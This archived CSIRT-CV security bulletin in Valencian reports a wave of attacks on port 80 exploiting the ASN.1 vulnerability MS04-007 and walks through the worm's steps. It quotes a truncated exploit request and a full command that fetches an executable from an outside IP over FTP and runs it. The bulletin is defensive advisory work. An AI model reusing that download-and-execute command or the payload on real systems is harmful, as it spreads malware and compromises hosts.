Está usted visitando una publicación en la hemeroteca de CSIRT-CV.
Para acceder al portal y contenido actual, visite https://www.csirtcv.gva.es
17/02/2011
El que ja no és tan comú és que anys després hi haja un augment tan elevat d'atacs, sent aquests de distints orígens.
Els atacs provenen de tot el món (en el cas de la imatge; USA, Índia, Japó, Rússia, Taiwan… ) i en un breu espai de temps. En concret, els atacs que es reben són al port 80, on s'obtenen peticions del tipus:
GET / HTTP/1.0
Host: XXX.XXX.XXX.XXX
Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU…
Després d'una ràpida investigació, el mes probable és que s'estiga intentant explotar la vulnerabilitat d'ASN.1, detallada en MS04-007 i en SANS.edu.
L'atac realitza el següent:
1r) Executa l'exploit.
2n) Si té èxit, obri un servidor ftp en el port 21.
3r) Una vegada obert el port, es descarrega el codi maliciós (malware) amb una orde com la següent:
cmd /c tire open 210.134.62.199 21 > o&echo user 1 1 >> o &echo get Rewetsr.Exe >> o &echo quit >> o &ftp -n -s:o &Rewetsr.Exe
4t) Executa el codi maliciós (malware), s'infecta i torna a realitzar el mateix atac per a propagar-se a altres sistemes.
Podeu continuar llegint aquesta notícia en http://www.securityartwork.es/2011/02/10/vuelven-los-viejos-conocidos/